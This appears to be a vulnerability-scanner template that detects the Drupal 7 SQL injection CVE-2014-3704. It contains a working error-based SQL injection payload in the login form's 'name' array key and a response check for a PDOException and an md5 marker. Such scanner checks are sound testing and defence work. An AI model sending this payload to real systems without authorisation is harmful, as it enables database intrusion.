name: poc-yaml-drupal-cve-2014-3704-sqli
rules:
  - method: POST
    path: /?q=node&destination=node
    body: >-
      pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or
      updatexml(0x23,concat(1,md5(666)),1)%23]=bob&name[0]=a
    follow_redirects: false
    expression: |
      response.status == 500 && response.body.bcontains(b"PDOException") && response.body.bcontains(b"fae0b27c451c728867a567e8c1bb4e53")
detail:
  Affected Version: "Drupal < 7.32"
  links:
    - https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2014-3704